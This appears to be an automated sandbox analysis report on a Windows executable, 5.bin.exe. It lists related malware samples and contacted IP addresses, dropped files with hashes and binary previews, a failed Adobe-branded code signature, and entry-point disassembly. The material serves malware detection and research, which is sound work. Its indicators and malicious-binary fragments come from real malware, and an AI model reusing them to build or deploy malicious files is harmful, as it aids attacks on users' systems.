                                                                                                      4.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      3.bin.exeGet hashmaliciousKnightCryptBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      3.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      eqd.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      pb1103.exeGet hashmaliciousFabookieBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      pb1103.exeGet hashmaliciousFabookieBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      BOQ-Al Gurg Automation Project.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      BOQ-Al Gurg Automation Project.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      C:\Users\user\AppData\Roaming\msls31\Dashboard.exe2.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                        1.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                          4.bin.exeGet hashmaliciousKnightCryptBrowse
                                                                                                            4.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                              3.bin.exeGet hashmaliciousKnightCryptBrowse
                                                                                                                3.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.856085428939782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:DlFL/u5FuSbxWAAZ5+oW7JfPCpXIQcQRc6KCcE+cw3WUeU3+HbHgoC5AJLnxZU6/:Z527uHjHPlUojNq/u7s3S274ltns
                                                                                                                  MD5:2BB41A253F7DC2BDBF0F3EB44B839422
                                                                                                                  SHA1:935DB702E5A50DC95CE343D7B2B2B67FB0E12469
                                                                                                                  SHA-256:3D4B8A9CFA7BC71F05101172DF296F6ED8EC0BDA00E573B0071AE15135F4F37A
                                                                                                                  SHA-512:84FF1674FFE9A500D1386BC48EF211B1DDE5818E25AB8CA1338BCF5219772C2CC93DA5C6240955ED7B2BBFA69728190A871FFB60B6A2E919FA344F2EBDDBF557
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.8.0.3.0.2.9.3.3.9.1.2.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.7.8.0.3.0.2.9.7.7.6.6.1.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.6.b.1.e.2.4.-.0.c.e.8.-.4.8.9.c.-.9.e.a.0.-.8.2.5.e.2.6.c.a.d.3.d.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.e.b.f.2.5.6.-.3.1.a.7.-.4.1.8.0.-.b.3.8.e.-.2.0.e.3.f.8.b.4.9.4.b.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.7.c.-.0.0.0.1.-.0.0.2.6.-.2.c.a.c.-.e.4.a.0.9.c.d.a.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.5.d.0.2.9.9.1.4.0.c.f.9.8.8.7.5.b.0.7.d.b.d.2.d.8.9.2.6.1.7.4.0.1.d.a.d.8.b.9.!.e.x.p.l.o.r.e.r...e.x.e.
                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Aug 29 17:17:09 2023, 0x1205a4 type
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):67112
                                                                                                                  Entropy (8bit):1.3728577384826837
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:5r8F8dG8JlOJ6qa6ocKLBNIbFLsi7hWcnus9q8CUKa7HXOiWzVGOoX8gWI8mI1NF:WueJs6XKt4wOhWo0HoX83E3s
                                                                                                                  MD5:B87EA1F2F0C706405F5D1293E35340BE
                                                                                                                  SHA1:6374381B6FEA912E8DEF73174C4F904FE83A0BF4
                                                                                                                  SHA-256:846AB71624A9DD08D53C70599DA5B2E55CA2842651DA06D77E2CE46B1812D2DA
                                                                                                                  SHA-512:6C1FB73F85B1B4AAB84930A02B50F9AB2D04643CD67DD8B0EA634D462C915D78E33E42F1761399726167BB60454B26DD8C197ABF3F7D78BE05985E3E27F929E6
                                                                                                                  Malicious:false
                                                                                                                  Preview:MDMP....... ........(.d........................................@6..........T.......8...........T...........8...............l...........X....................................................................U...........B..............Lw................>.....T.......|....(.d............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6556
                                                                                                                  Entropy (8bit):3.7223797427683074
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Rrl7r3GLNikhVYqfSWF+pD+89bz/7fZ4Rm:RrlsNi6VYqfSJzjfZD
                                                                                                                  MD5:8F1E52430AAB71BB9C6C24E96274D08B
                                                                                                                  SHA1:4BC9793B134368AA9ADCF31436174F6E66310A25
                                                                                                                  SHA-256:E1B3E9232DD0BC30B74265A66182BB12349236A670ABD36A2A6E74EE1B34AC79
                                                                                                                  SHA-512:FD35F5C65A6086275C6BC559469C150455E3A83C904B62848A8FD5E336825D6AAC93440A45CA0702174959CACCA49355F6936916C995570DCC6A823233B225E2
                                                                                                                  Malicious:false
                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.7.2.<./.P.i.d.>.......
                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4735
                                                                                                                  Entropy (8bit):4.481969606769758
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:cvIwSD8zsyJgtBI9AWVWgc8sqYjw8fm8M4JlDGcFyGOyq85MTGWQ0qAZd:uITfAyWkgrsqYRJYGObQ0qAZd
                                                                                                                  MD5:2F837C8EC71E7933A736C4B9D91F87A6
                                                                                                                  SHA1:75EFE67EA38ADA3FF3E6EE0EC78E8880AD9FB608
                                                                                                                  SHA-256:C19AC5D2E5CCD09521E8AC33E97B58F32DB224F0CDFFC27B76FDCF784A0FD49A
                                                                                                                  SHA-512:8195244762BA4FA915D7986D7358B8A76538573B8224C65A8D18ABF779FB91F7C2A36B41124A0B05A74DA011F85265603B0AB271F9A287EB588F6E5883782BAC
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2194707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                  Process:C:\Users\user\AppData\Roaming\msls31\Dashboard.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):778271
                                                                                                                  Entropy (8bit):7.685652051426883
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:32cqR4W/o4zo0asjNPfkrEeHYCzve0xKe8pcxViCJpmzRYJpRKBCdGY95:32cqqWwH0J5krEeHYCzvecKvuV5QOVKG
                                                                                                                  MD5:B35A451EAF29F860FD41BF5082D7E53D
                                                                                                                  SHA1:63AE36C60EBFB4A5E0DB0070E55DA9DF38686519
                                                                                                                  SHA-256:3444CBF881A5B81748B4F7ABA9F17101018C15FA51D503E83C4BB46E9B5B09ED
                                                                                                                  SHA-512:4A99DD4CBAA0E1B32ACE2B1E68DD1C6A4FEF402637832FD7739493642F396E9B26EC0875C3ECED128B642B6C9D3349DAEE66492336B348394CE9E5807D3CDBAE
                                                                                                                  Malicious:false
                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):345600
                                                                                                                  Entropy (8bit):6.401158637368881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:8S2lfkZS8UaZGi50qgA3KOpDPXmzC2epiog:e1sSDqgA3KOp0C2Ma
                                                                                                                  MD5:59F4ECF134A8CD83873D21DC6F00878F
                                                                                                                  SHA1:AAE050D1DEEECFA7396A4CEAB7F968BA1FEF0431
                                                                                                                  SHA-256:ECAFD694118C4BCD21B4F7A620ED8A1346932F05ACEFE8CD32A01FEBEC9A92D9
                                                                                                                  SHA-512:2CFE6E18FDDBE5E726C4A172C2C9CC21D8F7B67B318152D6FDC05B622B1FF64721B623306CF3A5A464C85DBDADA6CF5C49F89F802C86B0BD11C3E7C9710AE575
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...Fg.O..........#......(..........T$.........@.......................................... ......................................................................................................................... J..8...........@...8............................text...&&.......(.................. ..`.rdata......@.......,..............@..@.data...83..........................@....pdata.......@......................@..@.00cfg..(....`......................@..@.voltbl......p.........................._RDATA..............................@..@./9=....4........................... ..h.rsrc................4..............@..@bjo..................6..............@...........................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\5.bin.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1938847
                                                                                                                  Entropy (8bit):7.909107248524611
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:kAlkoobNs3nn8qNkEiTFLY16wcXXDKZlENwQ4t69kdLCoZPH6+eQyO3ioA1hHElN:1kbNsXzuEiRfXX2H36YvHmEld0x3Jfo
                                                                                                                  MD5:2AF7670DB4DB6E5C6A353C57BB478DAB
                                                                                                                  SHA1:D5001D5979628BCF4CEC5F280AC7DD5415D7460F
                                                                                                                  SHA-256:93C826661B1477F480306E0FABBB19988400D6E7C6C9081D32423E407ABBBD42
                                                                                                                  SHA-512:0E10784B1B0F499AB8B156DD6294AE94647094BDBDBDEE35F20718C80D661305FF65128F87957C47AF24403DF43DF5901436FB0CE1FED466FAA59B391B3BFA44
                                                                                                                  Malicious:false
                                                                                                                  Preview:.~nD]$:.P. ..fdQP.!.P."VX, .P..... .Y^hZ#. ... ../.(^5 .p.iG.zX...W...U.._.x..,..N.sJ.A.k.NJ>\B8...r"]..O.....g.k.;....D.......P.\.-..o.....o....:..tck.-...h......Y[9.E..:6:RN...#...f..dM..........f..9...J..N?....S..o...3..Z6:..............J.q../ .....#.....:6nq.U.4.i,...*.J.RqX.D........R..en..q.....y.E..7...f.J..i.p..e.....:6:R.....{...}.....t.vM.........?.uLnO...7..D.....-..!..s.,.Jt.....fjt.U1..>../.GH.2...A!1...A.......-..`o...\;.<)Pd...~e..K.....r]s?..(9.w.."...9l2....f.u tk.q...A.............U..2.....a.V=.w....GS...Dm.G].....i%:*F.....oDX..M...U.:.."r>l5W.`..H'*...w.d.O...'...N".......r...;7J..u.KR.i......J...$t.Q..:..r..YV...`.....Ek..Cv..n..v.W.}..BT9.....r..QD...).v..._8..O..T..)e..["-..g..g...........q...<?X....8i.w.......@.......l....\..'...|[.) Kt....~.PvyZi]...m..+.=...F....Gz..l.....I.L..@ z].....D).l.A*Y.;q{....%.[..s..8....G.L..s....7......?..P.<..0c]...S...1:I.}d!...t=C..1....>..#}....R.l..|...~....p._..5....^'~.......n..
                                                                                                                  Process:C:\Users\user\Desktop\5.bin.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):145264
                                                                                                                  Entropy (8bit):6.331826441761858
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:fW6vjvEUEzozIGnKyvBhSVeoVdS5jO4yEWzJ1gKs4H+u1ERB:REJWC+SVeoVdSZOqWbgKs4HPQ
                                                                                                                  MD5:704925ECFDB24EF81190B82DE0E5453C
                                                                                                                  SHA1:1128B3063180419893615CA73AD4F9DD51EBEAC6
                                                                                                                  SHA-256:8CC871EE8760A4658189528B4A5D8AFE9824F6A13FAAF1FE7EB56F2A3AD2D04E
                                                                                                                  SHA-512:CA187015812DDFCAA6515F3A5B780183B4A772801AA14B3F785D6DEE9B9AA7DB6402A7B346623FD24CF4A28F9856683022B10C3D812F8F2888E25BB218CBF216
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: 2.bin.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 1.bin.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 4.bin.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 4.bin.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 3.bin.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 3.bin.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........KC..*-..*-..*-.B.S..*-...P..*-...@..*-...V..*-..*,./*-...C..*-...Q..*-...U..*-.Rich.*-.................PE..L....mKF.....................................................................@......*............ ...........................v..........(...............p%..........P................................D..@............................................text............................... ..`.data...............................@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\5.bin.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):830464
                                                                                                                  Entropy (8bit):6.576145679043996
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:en0Y0yaWduIfHk898h2iKq6vPZTZpKNnSr71O7O7l9qk7XT:k0Y0yVumHRC2JnP1Bp9qk7
                                                                                                                  MD5:7D872477323AE325F650B06B4F439683
                                                                                                                  SHA1:2FE866293D86DF9D0516D3468635B806A6D36F70
                                                                                                                  SHA-256:4C38F9A9E10732D6ACBCD71D9024B07CE2F7F877516A0277632BA301C3306110
                                                                                                                  SHA-512:979CA070811729DA622588D685A2F005D906C8515DF3A5CD45285C1CE2C2C346FE0DC768C1E9A65588F5037F8F60EFC776BECD31CF333AF1441919094E91E434
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.0P..^...^...^.......^..._...^.<.%...^... ...^.<.3...^.<.#...^.......^...Q...^.<.$...^.<.0...^.<."...^.<.&...^.Rich..^.........PE..L...w.:F...........!................4........0....0p....................................................................$^...........@..X....................P......................................x...@...........................................text............................... ..`.data........0......................@....rsrc...X....@......................@..@.reloc..X....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\5.bin.exe
                                                                                                                  File Type:PNG image data, 423 x 597, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):642615
                                                                                                                  Entropy (8bit):7.938310627471174
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:0Fa53h/fhbrnZxvw6MQXLHYjNmKE8bFPZZBRy4laZAuL82BAPSVHT3Lel:08hVZxw6Mu4jN08pxZBRyuwAuLEsHXel
                                                                                                                  MD5:EC774FAD95698C76E2FEAE1EB7253783
                                                                                                                  SHA1:9510294214015562B47881E0C1AB82430EE047DD
                                                                                                                  SHA-256:3AC241A3987DA616D1AFB0783D3593B60FABE528B42E86AD6886430CCE9AD8A4
                                                                                                                  SHA-512:DD93BFAE49C878E01B86694DB2C069DB971563816173C41E7AE67A5BD2D2EF1749E584A5EC3B04244353F2328859B1ECC72ECE8CC36534CA978002B8BFD547E2
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR.......U......?.@....pHYs..........+.... .IDATx..w.[.u.q.{....`.p..a.;.nInrb;..8qrs.......%.7.K.k.-.d..6...p..8..A....?.4...%.$MK.}...8.........Z...F@..5j|n.~...Q.F..Jm.Q....W.F.......j|^`.....P.O.H.....z5j..|Q........=...Q._..._ ..s)..^..5>_.V..5j|...z5j..|Q[.j.......Q..Em.Q....W.F....U.F.../j.^..5>_.V..5j|..E..x...~.#.....wQXm.W.H.#....v.@o....4..d........q..pE..I$....Fi$.u2.2.....D.%..I.a"a....o!./.....(.0A%...|8...S4....K...&.._.R^#...x..t.._!...:<....F.%.Th._..o......;4....V...1..'.~O'Um.W...}>..jM..s.....ju..E......OG...NW..VQ...r\.oey.c.h$z...'.D..;..w....`.......R....4...vIer.9.........tZ.R.....\...x...N...Q.F;?.@&;.m.V...]..lt:.....>q..qG..%*..V....;..o._z1.yK.......I..7........._....?ov...;9.W.......CC......<0....|.....O.\X...H$..^.^..XYY9s...C..{...T.f.S..D*..<.....J.b2...Z^Y6...d*.B...y.k_[..'.&..{..]..h.&..g..<4p."..g2..D..<..p.l.:33s..}..\..J.SD"...wmm..a...A...sS(...r.<......}..~^.\....D..]wP.....@..
                                                                                                                  Process:C:\Users\user\Desktop\5.bin.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):626688
                                                                                                                  Entropy (8bit):6.840096566307411
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:mxzh9hH5RVKTp0G+vFhr46CI600yZmGyYG:mph9hHzVKOpt6MmGyY
                                                                                                                  MD5:43143ABB001D4211FAB627C136124A44
                                                                                                                  SHA1:EDB99760AE04BFE68AAACF34EB0287A3C10EC885
                                                                                                                  SHA-256:CB8928FF2FAF2921B1EDDC267DCE1BB64E6FEE4D15B68CD32588E0F3BE116B03
                                                                                                                  SHA-512:CED96CA5D1E2573DBF21875CF98A8FCB86B5BCDCA4C041680A9CB87374378E04835F02AB569D5243608C68FEB2E9B30FFE39FEB598F5081261A57D1CE97556A6
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L.........@................!......;.............d.......................Rich...................PE..L...I^j[...........!.....0...p......+#.......@.....x......................................@..........................q...~..Pc..<....`.......................p..P3...B...............................F..@............@...............................text....'.......0.................. ..`.rdata......@.......@..............@..@.data...Li.......P..................@....rsrc........`.......@..............@..@.reloc...7...p...@...P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Entropy (8bit):6.167093080136981
                                                                                                                  TrID:
                                                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:5.bin.exe
                                                                                                                  File size:1'863'880 bytes
                                                                                                                  MD5:53c1fa0286a21f9269f7c0dd5d6ddcaf
                                                                                                                  SHA1:07eecfd07af0a7a6758d3141e57fbb252364c6b2
                                                                                                                  SHA256:1341bd6193ea223c05566aaca13fc1152732b67af8344519d6efaaf9ab6ed5f4
                                                                                                                  SHA512:e53416018753823b6eb6b4dffa45d7520c8deb116faafa398810d599c27e0316a8c047154fc79612a1ec4ddb96b21bbf4e48a246d09b72eaa83d02668f263831
                                                                                                                  SSDEEP:24576:9ucUS55cDR3NgJ4zJ1H+QI84rncvGt3nE6vlTlIxBkTde/cfkyg:9ucUS55cHgJIzez8+n9Bn3NTaBkYokyg
                                                                                                                  TLSH:9E857C4BB6A441F8D0BBC27989528647EBB178150F30ABDF16A4539A1F33BE15E3E311
                                                                                                                  File Content Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........D4J.%Z..%Z..%Z..\...%Z.'....%Z..t...%Z..t...%Z..t..C%Z.d....%Z..\...%Z..]...%Z..]...%Z..w...%Z..w...%Z...7..%Z.".'..%Z...'..%Z
                                                                                                                  Icon Hash:38644470a4c6710d
                                                                                                                  Entrypoint:0x1400e30ec
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x140000000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x550363B2 [Fri Mar 13 22:24:50 2015 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:6
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:6
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:6
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:be843536fdc17a2b5e02f8f44a2ad7ee
                                                                                                                  Signature Valid:false
                                                                                                                  Signature Issuer:CN=Symantec Class 3 Extended Validation Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                  Error Number:-2146869232
                                                                                                                  Not Before, Not After
                                                                                                                  • 1/14/2014 1:00:00 AM 1/8/2016 12:59:59 AM
                                                                                                                  Subject Chain
                                                                                                                  • CN=Adobe Systems Incorporated, OU="Photoshop, Bridge - SHA256", O=Adobe Systems Incorporated, L=San Jose, S=California, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:55EAE634AEEDE6EEE9EA506F1475C9E3
                                                                                                                  Thumbprint SHA-1:9248DBC13C8FCF01754184255CA1584333A11805
                                                                                                                  Thumbprint SHA-256:6EF1B0EF177790204A316DA0B3E4E419B90DDE12FE468FCEF4A86A0C444097E3
                                                                                                                  Serial:35A84FA503F89B498396BB489168A580
                                                                                                                  Instruction
                                                                                                                  dec eax
                                                                                                                  sub esp, 28h
                                                                                                                  call 00007F8A6CAFAB6Ch
                                                                                                                  dec eax
                                                                                                                  add esp, 28h
                                                                                                                  jmp 00007F8A6CAEA877h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  dec eax
                                                                                                                  sub esp, 28h
                                                                                                                  dec eax
                                                                                                                  test ecx, ecx
                                                                                                                  jne 00007F8A6CAEAA46h
                                                                                                                  call 00007F8A6CAEADA7h
                                                                                                                  mov dword ptr [eax], 00000016h
                                                                                                                  call 00007F8A6CAF1010h
                                                                                                                  xor eax, eax
                                                                                                                  jmp 00007F8A6CAEAA38h
                                                                                                                  mov eax, dword ptr [ecx+18h]
                                                                                                                  and eax, 20h
                                                                                                                  dec eax
                                                                                                                  add esp, 28h
                                                                                                                  ret
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                                  dec esp
                                                                                                                  mov dword ptr [esp+20h], ecx
                                                                                                                  push ebp
                                                                                                                  push esi
                                                                                                                  push edi
                                                                                                                  inc ecx
                                                                                                                  push esp
                                                                                                                  inc ecx
                                                                                                                  push ebp
                                                                                                                  inc ecx
                                                                                                                  push esi
                                                                                                                  inc ecx
                                                                                                                  push edi
                                                                                                                  dec eax
                                                                                                                  sub esp, 20h
                                                                                                                  dec ebp
                                                                                                                  mov esi, eax
                                                                                                                  dec eax
                                                                                                                  mov ebp, edx
                                                                                                                  dec esp
                                                                                                                  mov esp, ecx
                                                                                                                  dec esp
                                                                                                                  mov edi, ecx
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+68h], ecx
                                                                                                                  dec esp
                                                                                                                  mov ebp, edx
                                                                                                                  dec ebp
                                                                                                                  test eax, eax
                                                                                                                  je 00007F8A6CAEAA4Ch
                                                                                                                  dec ebp
                                                                                                                  test ecx, ecx
                                                                                                                  je 00007F8A6CAEAA47h
                                                                                                                  dec eax
                                                                                                                  test ecx, ecx
                                                                                                                  jne 00007F8A6CAEAA59h
                                                                                                                  call 00007F8A6CAEAD4Ch
                                                                                                                  mov dword ptr [eax], 00000016h
                                                                                                                  call 00007F8A6CAF0FB5h
                                                                                                                  xor eax, eax
                                                                                                                  dec eax
                                                                                                                  mov ebx, dword ptr [esp+70h]
                                                                                                                  dec eax
                                                                                                                  add esp, 20h
                                                                                                                  inc ecx
                                                                                                                  pop edi
                                                                                                                  inc ecx
                                                                                                                  pop esi
                                                                                                                  inc ecx
                                                                                                                  pop ebp
                                                                                                                  inc ecx
                                                                                                                  pop esp
                                                                                                                  pop edi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  ret
                                                                                                                  dec eax
                                                                                                                  mov edi, dword ptr [esp+00000080h]
                                                                                                                  dec eax
                                                                                                                  test edi, edi
                                                                                                                  je 00007F8A6CAEAA40h
                                                                                                                  xor edx, edx
                                                                                                                  dec eax
                                                                                                                  or eax, FFFFFFFFh
                                                                                                                  dec ecx
